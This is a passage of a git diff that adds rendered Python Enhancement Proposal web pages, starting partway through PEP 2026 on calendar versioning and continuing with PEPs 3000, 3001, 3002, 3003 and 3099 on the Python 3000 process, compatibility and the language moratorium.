  • +
+

A maintainer can see at a glance which versions are current and need testing.

+
+
+

Non-goals

+

Like the current scheme, only the micro version will be incremented for bug +fix and security releases, with no change to the major and minor. For example:

                                   Current scheme   Proposed 3.YY.micro
Initial release (Oct ’26)          3.15.0           3.26.0
1st bugfix release (Dec ’26)       3.15.1           3.26.1
2nd bugfix release (Feb ’27)       3.15.2           3.26.2
Final security release (Oct ’31)   3.15.17          3.26.17

No change to PEP 602 (Annual Release Cycle for Python):

+
    +
  • No change to the 17 months to develop a feature version: alphas, betas and +release candidates.
  • +
  • No change to the support duration: +two years of full support and three years of security fixes.
  • +
  • No change to the annual October release cadence.
  • +
+
+
+
+

Specification

+

Python versions are numbered 3.YY.micro where:

+
    +
  • 3 is the major version number +– it is always 3.
  • +
  • YY is the minor version number +- it is the short year number: {year} - 2000.
  • +
  • micro is the micro version number +- it is incremented for each bugfix or security release.
  • +
+

We’ll keep major version 3. Python 3 is the brand; there will be no Python 4.

+

In the year 2100, the minor will be 2100-2000 = 100, +therefore the version will be 3.100.0.
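Expressed as code, the mapping from release year to version prefix is simply:

def version_prefix(year: int) -> str:
    # Minor version under the proposed scheme: {year} - 2000.
    return f"3.{year - 2000}"

assert version_prefix(2026) == "3.26"
assert version_prefix(2100) == "3.100"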

+

Python 3.14 will be the last version before this change, released in 2025. +Python 3.26 will be the first version after this change, released in 2026. +There will be no Python 3.15 to 3.25 inclusive.

+
+
+

Security implications

+

None known. No change to durations or timing of bug fix and security phases.

+
+
+

How to teach this

+

We will announce this on blogs, in the 3.14 release notes, documentation, +and through outreach to the community.

+

This change targets the version following 3.14: +instead of 3.15 it will be 3.26. +This PEP was proposed in June 2024. +Development for the 3.15/3.26 release will begin in May 2025, +with the first alpha in October 2025 and initial release in October 2026. +We can already update documentation during the 3.14 cycle. +This gives plenty of notice.

+

We can make preview builds which only change the version for early testing.

+

We could ship a python3.15 command as part of Python 3.26 that immediately +errors out and tells the user to use python3.26 instead.

+
+
+

Rejected ideas

+
+

YY.0

+

For example, Python 26.0 would be released in 2026.

+

There’s not much appetite for Python version 4. +We don’t want to repeat 2-to-3, +and 4 has a lot of expectations by now. +We don’t want “earth-shattering changes”.

+

Perhaps Python 4 could be reserved for something big like removing the GIL +(PEP 703), +but the Steering Council made it clear the free-threading rollout must be gradual. +Will we stick with version 3 forever?

+

Another option would be to put the year in the major version and jump to 26.0. This way we could leapfrog all that 4.0 baggage.

+
+

Platform compatibility tags

+

Changing the major version would complicate packaging, however.

+

The Platform compatibility tags specification says the Python +version tag used in wheel filenames is given by +sysconfig.get_config_var("py_version_nodot"), +where the major and minor versions are joined together without a dot. +For example, 3.9 is 39.
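For example, on a given interpreter the tag can be inspected directly:

import sysconfig

# "39" on Python 3.9, "310" on Python 3.10: major and minor joined
# with no separator, which is where the ambiguity comes from.
print(sysconfig.get_config_var("py_version_nodot"))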

+
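For example, querying the tag on a Python 3.9 interpreter:

    >>> import sysconfig
    >>> sysconfig.get_config_var("py_version_nodot")
    '39'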

During the 3.10 alpha, there was ambiguity because 310 can be interpreted +as 3.10, 31.0, or 310.

+

The specification says an underscore can be used if needed, and PEP 641 +(“Using an underscore in the version portion of Python 3.10 compatibility tags”) +proposed this:

                        Version → tag → version                PEP 641 proposed version
Pre-3.10                3.9 → 39
Ambiguity after 3.10    3.10 → 310 → 3.10 or 31.0 or 310?      3_10
Ambiguity with YY.xx    26.0 → 260 → 2.60 or 26.0 or 260?      26_0
+

However, PEP 641 was rejected because of unknown side effects it might have on code in the wild.

+

We would need something like this for YY.0 versioning, +which would be a significant amount of complex work.

+
+
+

Ecosystem changes

+

Would changing the major version to double digits break code?

+

Yes, any novel change to the version inevitably does, because people make assumptions, such as the major always being 3, or the version parts always being single digits. For example:

Version change   Example                                        Expected   Actual
2.7.9 → 2.7.10   'this is Python {}'.format(sys.version[:5])    2.7.10     2.7.1
3.9 → 3.10       ".%s-%s" % (get_platform(), sys.version[0:3])  3.10       3.1
3 → 4            if sys.version_info[1] >= 9:                   4.0        0
3 → 26           if sys.version[0] == '3':                      26         2
+

The last one here is most relevant for YY.0 versioning. Therefore the 3.YY scheme is the safest and requires the fewest changes, because the shape of the version doesn’t change: it’s still a 3 followed by two digits.

+
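In all four rows the robust fix is the same: compare sys.version_info as a tuple rather than slicing the sys.version string. A minimal sketch:

    import sys

    # Compare version_info as a tuple; this stays correct for 3.9,
    # 3.10, 3.26 and a three-digit minor like 3.100 alike.
    if sys.version_info >= (3, 26):
        ...  # safe to rely on a 3.26+ feature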
+

Tip

+

Use Ruff’s YTT rules or Flake8’s flake8-2020 plugin to help find problems like these.

+
+
+
+

python3 command

+

PEP 394 (The “python” Command on Unix-Like Systems) outlines recommendations for the python, python2 and python3 commands. python can map to either python2 or python3. These recommendations would need revisiting if the major version changed and then kept changing annually.

+

Four years after Python 2.7’s end-of-life, we could recommend python only +maps to the latest Python 3+ version. +But what would python3 map to when Python 26.0 is out? +This would introduce additional complexity and cost.

+
+
+

CPython changes

+

In addition to python3 command changes, there are at least four places in +CPython that assume the major version is 3 and would need updating:

+ +
+
+

YY.0 rejection

+

The benefits of calendar versioning do not outweigh the combined costs of YY.0 versioning. Therefore, YY.0 versioning is rejected.

+
+
+
+

YY.MM

+

For example, Python 26.10 would be released in October 2026.

+

Building upon YY.0 versioning, we could also include the release month as the minor +version, like Ubuntu and Black. This would make it clear when in the year it was +released, and also when in the year it will reach end-of-life.

+

However, YY.MM versioning is rejected for many of the same reasons as YY.0 versioning.

+
+
+

3.YYYY

+

For example, Python 3.2026 would be released in 2026.

+

It’s clearer that the minor version is a year when four digits are used, and it avoids confusion with Ubuntu versions, which use YY.MM.

+
+

PY_VERSION_HEX

+

CPython’s C API PY_VERSION_HEX macro currently uses eight bits to encode the minor version, accommodating a maximum minor version of 255. To hold a four-digit year, it would need to be expanded to at least 11 bits (enough for 2047), or more comfortably 12 bits (enough for 4095).

+

This looks feasible, as it’s intended for numeric comparisons, such as +#if PY_VERSION_HEX >= .... In the top 8,000 PyPI projects +only one instance was found of bit shifting +(hexversion >> 16 != PY_VERSION_HEX >> 16).

+
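For reference, sys.hexversion exposes the same layout from Python, which makes the 8-bit minor field easy to see:

    import sys

    # sys.hexversion mirrors PY_VERSION_HEX: 8 bits each for major,
    # minor and micro, then 4 bits of release level and 4 bits of serial.
    major = (sys.hexversion >> 24) & 0xFF
    minor = (sys.hexversion >> 16) & 0xFF   # the 8-bit field discussed above
    micro = (sys.hexversion >> 8) & 0xFF
    assert (major, minor, micro) == sys.version_info[:3]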

However, 3.YYYY is rejected: changing from two to four digits would nevertheless need more work and break more code than the simpler 3.YY versioning.

+
+
+
+

Editions

+

For example, Python 3.15 (2026 Edition) would be released in 2026.

+

The Rust language uses +“Editions” +to introduce breaking changes. Applying this to Python would require big +changes to PEP 387 (Backwards Compatibility Policy) and is out of scope +for this PEP.

+

We could apply a year label to releases, such as “Python 3.15 (2026 Edition)”, +but this is rejected because we’d have to keep track of two numbers.

+
+
+

Adopt SemVer and skip 4

+

For example, Python 5.0 would be released in 2026, 6.0 in 2027, and so on.

+

We could skip the problematic 4.0 entirely and adopt SemVer. Because +deprecations are removed in every feature release, we would get a new major +bump every year.

+

This is rejected because we wouldn’t get the benefit of calendar versioning, and +moving away from 3.x would also break code.

+
+
+

Change during 3.14 cycle

+

The Python 3.14 release must go ahead because: π.

+
+
+
+

Backwards compatibility

+

This version change is the safest of the CalVer options considered +(see rejected ideas): we keep 3 as the major version, +and the minor version is still two digits. +The minor will eventually change to three digits but this is predictable, +a long way off and can be planned for.

+

We retain the python3 executable.

+
+

Version mapping

+

Versions 3.15 to 3.25 inclusive will be skipped. +Features, deprecations and removals planned for these will be remapped to the +new version numbers.

+

For example, a deprecation initially planned for removal in 3.16 will instead +be removed in 3.27.

Old version   New version        Initial release
3.14          3.14 (no change)   2025
3.15          3.26               2026
3.16          3.27               2027
3.17          3.28               2028
3.18          3.29               2029
3.19          3.30               2030
3.20          3.31               2031
3.21          3.32               2032
3.22          3.33               2033
3.23          3.34               2034
3.24          3.35               2035
3.25          3.36               2036
+
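The remapping is a constant offset of eleven; a throwaway sketch (the helper name is ours):

    def remap_minor(old_minor):
        """Map a planned 3.15-3.25 minor to its CalVer equivalent."""
        assert 15 <= old_minor <= 25
        return old_minor + 11

    assert remap_minor(16) == 27   # removal planned for 3.16 lands in 3.27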
+
+
+

Forwards compatibility

+
+

Future change in cadence

+

This PEP proposes no change to the annual release cadence as defined in +PEP 602, which lays out +many good reasons for annual releases +(for example, smaller releases with a predictable release calendar, +and syncing with external redistributors). +However unlikely, should we decide to change the cadence in the future, CalVer +does not preclude doing so.

+
+

Less frequent

+

If we went to fewer than one release per year, the proposed CalVer scheme +still works; indeed, it even helps people know in which year to expect the +release. For example, if we released every second year starting in 2036:

+
    +
  • 3.36.0 would be released in 2036
  • +
  • 3.38.0 would be released in 2038
  • +
  • and so on
  • +
+

Ecosystem changes depend in part on how the hypothetical cadence-changing PEP updates PEP 387 (Backwards Compatibility Policy). If, for example, it requires that the deprecation period must be at least one feature release rather than the current two (to maintain the minimum two years), CalVer has the benefit over the status quo of requiring no changes to planned removal versions (other than adjusting any falling in non-release years).

+
+
+

More frequent

+

If we went to more than one release per year, here are some options. +For example, if we released in April and October starting in 2036, the next +four releases could be:

Scheme          Notes                                      2036 a      2036 b      2037 a      2037 b
YY.MM.micro     Year as major, month as minor              36.04.0     36.10.0     37.04.0     37.10.0
YY.x.micro      Year as major, serial number as minor      36.1.0      36.2.0      37.1.0      37.2.0
3.YYMM.micro    Combine year and month as minor            3.3604.0    3.3610.0    3.3704.0    3.3710.0
3.YYx.micro     Combine year and serial number as minor    3.360.0     3.361.0     3.370.0     3.371.0
3.YY.MM.micro   Add an extra month segment                 3.36.04.0   3.36.10.0   3.37.04.0   3.37.10.0
3.major.micro   No more CalVer: increment minor            3.36.0      3.37.0      3.38.0      3.39.0
                                                           3.50.0      3.51.0      3.52.0      3.53.0
                                                           3.100.0     3.101.0     3.102.0     3.103.0
4.major.micro   No more CalVer: increment major            4.0.0       4.1.0       4.2.0       4.3.0
5.major.micro                                              5.0.0       5.1.0       5.2.0       5.3.0
+

The YY options would require addressing issues around the +platform compatibility tags, +the python3 command, and code +assuming the version always begins with 3.

+

The options keeping major version 3 but changing the minor to three or four +digits would also need to address code +assuming the version is always two digits.

+

The option adding an extra month segment is the biggest change as code would +need to deal with a four-part version instead of three.

+

The options dropping CalVer would be the most conservative, allowing the major and minor to be chosen freely.

+
+
+
+

No more CalVer

+

Adopting CalVer now does not preclude moving away from CalVer in the future, for example, back to the original scheme, to SemVer or to another scheme. Some options are listed in the table above. To make it clear the minor is no longer the year, it could be bumped to a higher round number (for example, 3.50 or 3.100), or the major version could be bumped (for example, to 4.0 or 5.0). Additionally, a version epoch could be considered.

+
+
+
+

Footnotes

+

The author proposed calendar versioning at the Python Language Summit 2024; +this PEP is a result of discussions there and during PyCon US.

+

Read the slides +and blogpost +of the summit talk.

+
+
+

Acknowledgements

+

Thanks to Seth Michael Larson for the Language Summit Q&A notes and blogpost, +and to everyone who gave feedback at the summit and PyCon US.

+

Thank you to Łukasz Langa and Alex Waygood for reviewing a draft of this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-2026.rst

+

Last modified: 2024-09-26 00:34:23 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3000/index.html b/pep-3000/index.html new file mode 100644 index 00000000000..9a996f85db2 --- /dev/null +++ b/pep-3000/index.html @@ -0,0 +1,265 @@ + + + + + + + + PEP 3000 – Python 3000 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3000 – Python 3000

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
05-Apr-2006
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP sets guidelines for Python 3000 development. Ideally, we +first agree on the process, and start discussing features only after +the process has been decided and specified. In practice, we’ll be +discussing features and process simultaneously; often the debate about +a particular feature will prompt a process discussion.

+
+
+

Naming

+

Python 3000, Python 3.0 and Py3K are all names for the same thing. +The project is called Python 3000, or abbreviated to Py3k. The actual +Python release will be referred to as Python 3.0, and that’s +what “python3.0 -V” will print; the actual file names will use the +same naming convention we use for Python 2.x. I don’t want to pick a +new name for the executable or change the suffix for Python source +files.

+
+
+

PEP Numbering

+

Python 3000 PEPs are numbered starting at PEP 3000. PEPs 3000-3099 are meta-PEPs – these can be either process or informational PEPs. PEPs 3100-3999 are feature PEPs. PEP 3000 itself (this PEP) is special; it is the meta-PEP for Python 3000 meta-PEPs (IOW it describes the process to define processes). PEP 3100 is also special; it’s a laundry list of features that were selected for (hopeful) inclusion in Python 3000 before we started the Python 3000 process for real. PEP 3099, finally, is a list of features that will not change.

+
+
+

Timeline

+

See PEP 361, which contains the release schedule for Python +2.6 and 3.0. These versions will be released in lockstep.

+

Note: standard library development is expected to ramp up after 3.0a1 +is released.

+

I expect that there will be parallel Python 2.x and 3.x releases for +some time; the Python 2.x releases will continue for a longer time +than the traditional 2.x.y bugfix releases. Typically, we stop +releasing bugfix versions for 2.x once version 2.(x+1) has been +released. But I expect there to be at least one or two new 2.x +releases even after 3.0 (final) has been released, probably well into +3.1 or 3.2. This will to some extent depend on community demand for +continued 2.x support, acceptance and stability of 3.0, and volunteer +stamina.

+

I expect that Python 3.1 and 3.2 will be released much sooner after +3.0 than has been customary for the 2.x series. The 3.x release +pattern will stabilize once the community is happy with 3.x.

+
+
+

Compatibility and Transition

+

Python 3.0 will break backwards compatibility with Python 2.x.

+

There is no requirement that Python 2.6 code will run unmodified on +Python 3.0. Not even a subset. (Of course there will be a tiny +subset, but it will be missing major functionality.)

+

Python 2.6 will support forward compatibility in the following two +ways:

+
    +
  • It will support a “Py3k warnings mode” which will warn dynamically +(i.e. at runtime) about features that will stop working in Python +3.0, e.g. assuming that range() returns a list.
  • +
  • It will contain backported versions of many Py3k features, either +enabled through __future__ statements or simply by allowing old and +new syntax to be used side-by-side (if the new syntax would be a +syntax error in 2.x).
  • +
+

Instead, and complementary to the forward compatibility features in +2.6, there will be a separate source code conversion tool [1]. This +tool can do a context-free source-to-source translation. For example, +it can translate apply(f, args) into f(*args). However, the +tool cannot do data flow analysis or type inferencing, so it simply +assumes that apply in this example refers to the old built-in +function.

+

The recommended development model for a project that needs to support +Python 2.6 and 3.0 simultaneously is as follows:

+
    +
  1. You should have excellent unit tests with close to full coverage.
  2. Port your project to Python 2.6.
  3. Turn on the Py3k warnings mode.
  4. Test and edit until no warnings remain.
  5. Use the 2to3 tool to convert this source code to 3.0 syntax. Do not manually edit the output!
  6. Test the converted source code under 3.0.
  7. If problems are found, make corrections to the 2.6 version of the source code and go back to step 3.
  8. When it’s time to release, release separate 2.6 and 3.0 tarballs (or whatever archive form you use for releases).
+

It is recommended not to edit the 3.0 source code until you are ready +to reduce 2.6 support to pure maintenance (i.e. the moment when you +would normally move the 2.6 code to a maintenance branch anyway).

+

PS. We need a meta-PEP to describe the transitional issues in detail.

+
+
+

Implementation Language

+

Python 3000 will be implemented in C, and the implementation will be +derived as an evolution of the Python 2 code base. This reflects my +views (which I share with Joel Spolsky [2]) on the dangers of complete +rewrites. Since Python 3000 as a language is a relatively mild +improvement on Python 2, we can gain a lot by not attempting to +reimplement the language from scratch. I am not against parallel +from-scratch implementation efforts, but my own efforts will be +directed at the language and implementation that I know best.

+
+
+

Meta-Contributions

+

Suggestions for additional text for this PEP are gracefully accepted +by the author. Draft meta-PEPs for the topics above and additional +topics are even more welcome!

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3000.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3001/index.html b/pep-3001/index.html new file mode 100644 index 00000000000..c5c16f391b5 --- /dev/null +++ b/pep-3001/index.html @@ -0,0 +1,232 @@ + + + + + + + + PEP 3001 – Procedure for reviewing and improving standard library modules | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3001 – Procedure for reviewing and improving standard library modules

+
+
Author:
+
Georg Brandl <georg at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Process
+
Created:
+
05-Apr-2006
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a procedure for reviewing and improving standard +library modules, especially those written in Python, making them ready +for Python 3000. There can be different steps of refurbishing, each +of which is described in a section below. Of course, not every step +has to be performed for every module.

+
+
+

Removal of obsolete modules

+

All modules marked as deprecated in 2.x versions should be removed for +Python 3000. The same applies to modules which are seen as obsolete today, +but are too widely used to be deprecated or removed. Python 3000 is the +big occasion to get rid of them.

+

There will have to be a document listing all removed modules, together +with information on possible substitutes or alternatives. This +information will also have to be provided by the python3warn.py porting +helper script mentioned in PEP XXX.

+
+
+

Renaming modules

+

There are proposals for a “great stdlib renaming” introducing a hierarchic +library namespace or a top-level package from which to import standard +modules. That possibility aside, some modules’ names are known to have +been chosen unwisely, a mistake which could never be corrected in the 2.x +series. Examples are names like “StringIO” or “Cookie”. For Python 3000, +there will be the possibility to give those modules less confusing and +more conforming names.

+

Of course, each rename will have to be stated in the documentation of +the respective module and perhaps in the global document of Step 1. +Additionally, the python3warn.py script will recognize the old module +names and notify the user accordingly.

+

If the name change is made in time for another release of the Python 2.x series, it is worth considering introducing the new name in the 2.x branch to ease the transition.

+
+
+

Code cleanup

+

As most library modules written in Python have not been touched except +for bug fixes, following the policy of never changing a running system, +many of them may contain code that is not up to the newest language +features and could be rewritten in a more concise, modern Python.

+

PyChecker should run cleanly over the library. With a carefully tuned +configuration file, PyLint should also emit as few warnings as possible.

+

As long as these changes don’t change the module’s interface and behavior, +no documentation updates are necessary.

+
+
+

Enhancement of test and documentation coverage

+

Code coverage by unit tests varies greatly between modules. Each test +suite should be checked for completeness, and the remaining classic tests +should be converted to PyUnit (or whatever new shiny testing framework +comes with Python 3000, perhaps py.test?).

+

It should also be verified that each publicly visible function has a +meaningful docstring which ideally contains several doctests.

+

No documentation changes are necessary for enhancing test coverage.

+
+
+

Unification of module metadata

+

This is a small and probably not very important step. There have been +various attempts at providing author, version and similar metadata in +modules (such as a “__version__” global). Those could be standardized +and used throughout the library.

+

No documentation changes are necessary for this step either.

+
+
+

Backwards incompatible bug fixes

+

Over the years, many bug reports have been filed which complained about +bugs in standard library modules, but have subsequently been closed as +“Won’t fix” since a fix would have introduced a major incompatibility +which was not acceptable in the Python 2.x series. In Python 3000, the +fix can be applied if the interface per se is still acceptable.

+

Each slight behavioral change caused by such fixes must be mentioned in +the documentation, perhaps in a “Changed in Version 3.0” paragraph.

+
+
+

Interface changes

+

The last and most disruptive change is the overhaul of a module’s public +interface. If a module’s interface is to be changed, a justification +should be made beforehand, or a PEP should be written.

+

The change must be fully documented as “New in Version 3.0”, and the +python3warn.py script must know about it.

+
+
+

References

+

None yet.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3001.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3002/index.html b/pep-3002/index.html new file mode 100644 index 00000000000..7c6f91056b6 --- /dev/null +++ b/pep-3002/index.html @@ -0,0 +1,224 @@ + + + + + + + + PEP 3002 – Procedure for Backwards-Incompatible Changes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3002 – Procedure for Backwards-Incompatible Changes

+
+
Author:
+
Steven Bethard <steven.bethard at gmail.com>
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
27-Mar-2006
+
Post-History:
+
27-Mar-2006, 13-Apr-2006
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes the procedure for changes to Python that are +backwards-incompatible between the Python 2.X series and Python 3000. +All such changes must be documented by an appropriate Python 3000 PEP +and must be accompanied by code that can identify when pieces of +Python 2.X code may be problematic in Python 3000.

+
+
+

Rationale

+

Python 3000 will introduce a number of backwards-incompatible changes +to Python, mainly to streamline the language and to remove some +previous design mistakes. But Python 3000 is not intended to be a new +and completely different language from the Python 2.X series, and it +is expected that much of the Python user community will make the +transition to Python 3000 when it becomes available.

+

To encourage this transition, it is crucial to provide a clear and +complete guide on how to upgrade Python 2.X code to Python 3000 code. +Thus, for any backwards-incompatible change, two things are required:

+
    +
  • An official Python Enhancement Proposal (PEP)
  • +
  • Code that can identify pieces of Python 2.X code that may be +problematic in Python 3000
  • +
+
+
+

Python Enhancement Proposals

+

Every backwards-incompatible change must be accompanied by a PEP. +This PEP should follow the usual PEP guidelines and explain the +purpose and reasoning behind the backwards incompatible change. In +addition to the usual PEP sections, all PEPs proposing +backwards-incompatible changes must include an additional section: +Compatibility Issues. This section should describe what is backwards +incompatible about the proposed change to Python, and the major sorts +of breakage to be expected.

+

While PEPs must still be evaluated on a case-by-case basis, a PEP may +be inappropriate for Python 3000 if its Compatibility Issues section +implies any of the following:

+
    +
  • Most or all instances of a Python 2.X construct are incorrect in +Python 3000, and most or all instances of the Python 3000 construct +are incorrect in Python 2.X.

    So for example, changing the meaning of the for-loop else-clause +from “executed when the loop was not broken out of” to “executed +when the loop had zero iterations” would mean that all Python 2.X +for-loop else-clauses would be broken, and there would be no way to +use a for-loop else-clause in a Python-3000-appropriate manner. +Thus a PEP for such an idea would likely be rejected.

    +
  • +
  • Many instances of a Python 2.X construct are incorrect in Python +3000 and the PEP fails to demonstrate real-world use-cases for the +changes.

    Backwards incompatible changes are allowed in Python 3000, but not +to excess. A PEP that proposes backwards-incompatible changes +should provide good examples of code that visibly benefits from the +changes.

    +
  • +
+

PEP-writing is time-consuming, so when a number of +backwards-incompatible changes are closely related, they should be +proposed in the same PEP. Such PEPs will likely have longer +Compatibility Issues sections, however, since they must now describe +the sorts of breakage expected from all the proposed changes.

+
+
+

Identifying Problematic Code

+

In addition to the PEP requirement, backwards incompatible changes to +Python must also be accompanied by code to issue warnings for pieces +of Python 2.X code that will behave differently in Python 3000. Such +warnings will be enabled in Python 2.X using a new command-line +switch: -3. All backwards incompatible changes should be +accompanied by a patch for Python 2.X that, when -3 is +specified, issues warnings for each construct that is being changed.

+

For example, if dict.keys() returns an iterator in Python 3000, +the patch to the Python 2.X branch should do something like:

+
+
If -3 was specified, change dict.keys() to return a +subclass of list that issues warnings whenever you use any +methods other than __iter__().
+
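A rough pure-Python sketch of that idea (illustrative only; the real patch would live at the C level, and the class name here is invented):

    import warnings

    class Py3kKeysList(list):
        """Sketch of a keys() result that warns on non-iterator use."""
        # Only __getitem__ is wrapped here; the described patch would
        # cover every list method other than __iter__().
        def __getitem__(self, index):
            warnings.warn(
                "dict.keys() will return an iterator in Python 3000",
                DeprecationWarning, stacklevel=2)
            return list.__getitem__(self, index)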

Such a patch would mean that warnings are only issued when features +that will not be present in Python 3000 are used, and almost all +existing code should continue to work. (Code that relies on +dict.keys() always returning a list and not a subclass should +be pretty much non-existent.)

+
+
+

References

+

TBD

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3002.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3003/index.html b/pep-3003/index.html new file mode 100644 index 00000000000..7b393818522 --- /dev/null +++ b/pep-3003/index.html @@ -0,0 +1,304 @@ + + + + + + + + PEP 3003 – Python Language Moratorium | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3003 – Python Language Moratorium

+
+
Author:
+
Brett Cannon, Jesse Noller, Guido van Rossum
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
21-Oct-2009
+
Post-History:
+
03-Nov-2009
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a temporary moratorium (suspension) of all changes +to the Python language syntax, semantics, and built-ins for a period +of at least two years from the release of Python 3.1. In particular, the +moratorium would include Python 3.2 (to be released 18-24 months after +3.1) but allow Python 3.3 (assuming it is not released prematurely) to +once again include language changes.

+

This suspension of features is designed to allow non-CPython implementations +to “catch up” to the core implementation of the language, help ease adoption +of Python 3.x, and provide a more stable base for the community.

+
+
+

Rationale

+

This idea was proposed by Guido van Rossum on the python-ideas [1] mailing +list. The premise of his email was to slow the alteration of the Python core +syntax, builtins and semantics to allow non-CPython implementations to catch +up to the current state of Python, both 2.x and 3.x.

+

Python, as a language, is more than its core implementation, CPython; it has a rich, mature and vibrant community of implementations, such as Jython [2], IronPython [3] and PyPy [4], that are a benefit not only to the community, but to the language itself.

+

Still others, such as Unladen Swallow [5] (a branch of CPython) seek not to +create an alternative implementation, but rather they seek to enhance the +performance and implementation of CPython itself.

+

Python 3.x was a large part of the last several years of Python’s +development. Its release, as well as a bevy of changes to the language +introduced by it and the previous 2.6.x releases, puts alternative +implementations at a severe disadvantage in “keeping pace” with core python +development.

+

Additionally, many of the changes put into the recent releases of the language +as implemented by CPython have not yet seen widespread usage by the +general user population. For example, most users are limited to the version +of the interpreter (typically CPython) which comes pre-installed with their +operating system. Most OS vendors are just barely beginning to ship Python 2.6 +– even fewer are shipping Python 3.x.

+

As it is expected that Python 2.7 will be the effective “end of life” of the Python 2.x code line, with Python 3.x being the future, it is in the best interest of Python core development to temporarily suspend the alteration of the language itself to allow all of these external entities to catch up and to assist in the adoption of, and migration to, Python 3.x.

+

Finally, the moratorium is intended to free up cycles within core development +to focus on other issues, such as the CPython interpreter and improvements +therein, the standard library, etc.

+

This moratorium does not allow for exceptions – once accepted, any pending +changes to the syntax or semantics of the language will be postponed until the +moratorium is lifted.

+

This moratorium does not attempt to apply to any other Python implementation +meaning that if desired other implementations may add features which deviate +from the standard implementation.

+
+
+

Details

+
+

Cannot Change

+
    +
  • New built-ins
  • +
  • +
    Language syntax
    The grammar file essentially becomes immutable apart from ambiguity +fixes.
    +
    +
  • +
  • +
    General language semantics
    The language operates as-is with only specific exemptions (see +below).
    +
    +
  • +
  • +
    New __future__ imports
    These are explicitly forbidden, as they effectively change the language +syntax and/or semantics (albeit using a compiler directive).
    +
    +
  • +
+
+
+

Case-by-Case Exemptions

+
    +
  • +
    New methods on built-ins
    The case for adding a method to a built-in object can be made.
    +
    +
  • +
  • +
    Incorrect language semantics
    If the language semantics turn out to be ambiguous or improperly +implemented based on the intention of the original design then the +semantics may change.
    +
    +
  • +
  • +
    Language semantics that are difficult to implement
    Because other VMs have not begun implementing Python 3.x semantics +there is a possibility that certain semantics are too difficult to +replicate. In those cases they can be changed to ease adoption of +Python 3.x by the other VMs.
    +
    +
  • +
+
+
+

Allowed to Change

+
    +
  • +
    C API
    It is entirely acceptable to change the underlying C code of +CPython as long as other restrictions of this moratorium are not +broken. E.g. removing the GIL would be fine assuming certain +operations that are currently atomic remain atomic.
    +
    +
  • +
  • +
    The standard library
    As the standard library is not directly tied to the language +definition it is not covered by this moratorium.
    +
    +
  • +
  • +
    Backports of 3.x features to 2.x
    The moratorium only affects features that would be new in 3.x.
    +
    +
  • +
  • +
    Import semantics
    For example, PEP 382. After all, import semantics vary between +Python implementations anyway.
    +
    +
  • +
+
+
+
+

Retroactive

+

It is important to note that the moratorium covers all changes since the release +of Python 3.1. This rule is intended to avoid features being rushed or smuggled +into the CPython source tree while the moratorium is being discussed. A review +of the NEWS file for the py3k development branch showed no commits would need to +be rolled back in order to meet this goal.

+
+
+

Extensions

+

The time period of the moratorium can only be extended through a new PEP.

+
+ +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3003.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3099/index.html b/pep-3099/index.html new file mode 100644 index 00000000000..bf32b9c5836 --- /dev/null +++ b/pep-3099/index.html @@ -0,0 +1,313 @@ + + + + + + + + PEP 3099 – Things that will Not Change in Python 3000 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3099 – Things that will Not Change in Python 3000

+
+
Author:
+
Georg Brandl <georg at python.org>
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
04-Apr-2006
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Some ideas are just bad. While some thoughts on Python evolution are +constructive, some go against the basic tenets of Python so +egregiously that it would be like asking someone to run in a circle: +it gets you nowhere, even for Python 3000, where extraordinary +proposals are allowed. This PEP tries to list all BDFL pronouncements +on Python 3000 that refer to changes that will not happen and new +features that will not be introduced, sorted by topics, along with +a short explanation or a reference to the relevant thread on the +python-3000 mailing list.

+

If you think you should suggest any of the listed ideas it would be +better to just step away from the computer, go outside, and enjoy +yourself. Being active outdoors by napping in a nice patch of grass +is more productive than bringing up a beating-a-dead-horse idea and +having people tell you how dead the idea is. Consider yourself warned.

+
+
+

Core language

+ +
+
+

Builtins

+ +
+
+

Standard types

+ +
+
+

Coding style

+ +
+
+

Interactive Interpreter

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3099.rst

+

